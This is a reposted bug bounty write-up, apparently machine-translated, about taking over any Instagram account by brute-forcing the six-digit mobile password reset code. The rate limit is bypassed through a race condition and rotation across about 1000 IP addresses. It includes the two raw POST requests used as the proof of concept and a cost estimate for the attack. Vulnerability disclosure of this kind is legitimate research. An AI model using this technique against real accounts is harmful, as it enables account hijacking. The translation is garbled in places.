Shulou(Shulou.com)05/31 Report--

How to break through the rate limit to get any Instagram account, I believe that many inexperienced people do not know what to do, so this article summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

The Writeup is about the arbitrary account hijacking vulnerability of the Instagram platform. By constructing a method to break through the rate limit (Rate Limiting), the author can violently guess the password reset confirmation code of any Instagram account, so as to realize the Instagram account hijacking. The following is the author's share.

Try your luck from the password reset function entry

After the famous data breach, Facebook continues to improve its security controls throughout the platform. In order to reward serious vulnerabilities, including account hijacking, Facebook increased the amount of vulnerability reward accordingly. I wanted to try my luck and see if I could find something, and I really hit the jackpot on Instagram. (Instagram is a sub-app of Facebook)

As soon as I started testing Instagram, I thought of the account hijacking vulnerability (Account Takeover), which should of course be related to Instagram's forgotten password feature. So I repeated the password reset test with my own Instagram account in Web mode. After the password reset request is issued, Instagram will return a reset link to the corresponding mailbox of the account. This reset link seems to be fully protected and watertight, and I can't find any flaws.

In-depth analysis of steering mobile end

So I turned to the password reset mechanism on the Instagram mobile app, only to find a suspicious behavior here. Under the password reset requirement, when the user enters his mobile phone number, Instagram will send a 6-digit confirmation code to the mobile phone number, and the password reset will not take effect until the 6-digit confirmation code is entered on the mobile phone. In theory, this 6-digit confirmation code has 1 million possibilities of 10 "10" 10 "10" 10 *. If I can try all of these 1 million possibilities on my phone, will it be possible to hijack any account? To be sure, there must be a certain rate limit (Rate Limiting) at the back end of Instagram in response to this kind of brute force cracking. But I decided to give it a try.

At least my tests verify what the rate-limiting mechanism at the back end of Instagram looks like. Of the more than 1000 requests I have sent, about 250 will be effectively passed, and the remaining 750 will be blocked by the rate-limiting mechanism. Then I sent another set of more than 1000 requests, most of which were blocked by the rate-limiting mechanism this time. From this point of view, the authentication and rate-limiting mechanism of Instagram is OK.

But two things I don't understand are the number of requests made and the fact that Instagram doesn't blacklist requests. The reason is that even if I can send a limited number of requests in a short period of time, I can send requests continuously without being blocked. This is it. Is there something wrong with it?

Find a way to break the rate limit (Rate Limiting)

After several days of continuous testing, I found a way to successfully bypass the Instagram rate limit mechanism, that is:

Race Hazard (race condition)

IP Rotation (IP rotation)

Competitive adventure (Race Hazard): also known as race condition, competition condition (Race Condition), it is designed to describe that the output of a system or process depends on the sequence or timing of uncontrolled events. The word comes from two signals trying to compete with each other to influence who outputs first.

For example, if two processes in a computer try to modify the contents of a shared memory at the same time, in the absence of concurrency control, the final result depends on the execution order and timing of the two processes. And if there is a concurrent access conflict, the final result is incorrect. Competitive risk is common in poorly designed electronic systems, especially logic circuits. However, they are also common in software, especially those that use multithreading technology.

IP rotation (IP Rotation): it means that the same server interface is requested with different IP addresses within a certain period of time. This kind of IP address rotation can usually be realized by proxy, which is applied to break through the website anti-crawler mechanism to crawl a large amount of data.

If you know little about competitive adventure (Race Hazard) or competitive conditions (Race Condition), please be familiar with Baidu yourself. Under the condition of race, I use multiple IP addresses to send multiple password reset confirmation codes to the Instagram backend. In this case, the rate limit mechanism of Instagram can be bypassed and not blocked. The number of requests that can be sent depends on the concurrency of the request and the number of IP addresses we use. In addition, I also found that the password reset confirmation code expires after 10 minutes, which makes this kind of attack more difficult, so we may need as many as 1000 different IP addresses to perform this attack.

Later, after I reported the vulnerability to Facebook, their security team was initially unable to reproduce the vulnerability because it was not detailed in the vulnerability report. After repeated email communication with them, I made a proof-of-concept video to send to them, and finally they confirmed the effectiveness of the vulnerability.

Confirmatory attack (PoC)

Request the confirmation code from the Instagram backend when password is reset:

POST / api/v1/users/lookup/ HTTP/1.1User-Agent: Instagram 92.0.0.11.114 Android (27 Pro; tulip; qcom; en_IN; 8.1.0; 440 dpi; 1080 × 2150; Xiaomi/xiaomi; Redmi Note 6 Pro; tulip; qcom; en_IN; 152830654) Accept-Language: en-IN, en-USContent-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflateHost: i.instagram.comConnection: keep-aliveq=mobile_number&device_id=android-device-id-here

After the POST request is made, the victim will receive a 6-digit password reset confirmation code, which is valid for 10 minutes.

After the client enters the above confirmation code, the Instagram backend verifies the confirmation code:

POST / api/v1/accounts/account_recovery_code_verify/ HTTP/1.1User-Agent: Instagram 92.0.0.11.114 Android (27 Pro; tulip; qcom; en_IN; 8.1.0; 440 dpi; 1080 × 2150; Xiaomi/xiaomi; Redmi Note 6 Pro; tulip; qcom; en_IN; 152830654) Accept-Language: en-IN, en-USContent-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflateHost: i.instagram.comConnection: keep-aliverecover_code=123456&device_id=android-device-id-here

Based on the above two POST requests and the previous attack strategy, we need to use multiple IP addresses to violently guess the password reset server. Tests have found that, roughly speaking, I can send nearly 2000 requests per IP address without being blocked by the rate limit on the Instagram back end.

In my actual test, I used 1000 IP addresses corresponding to 1000 machines and easily achieved request concurrency, sending nearly 200000 requests, accounting for 20% of the total probability of 1 million.

In a real attack scenario, an attacker can successfully violently guess a valid password reset confirmation code with 5000 IP addresses, thus "hacking" (hijacking) an Instagram account. So many IP addresses may sound hard to achieve, but if you can easily have so many IP addresses with cloud services such as Amazon or Google, performing a violent guess of a million password reset confirmation codes will cost only $150. This....

After reading the above, do you know how to break the rate limit and get any Instagram account? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.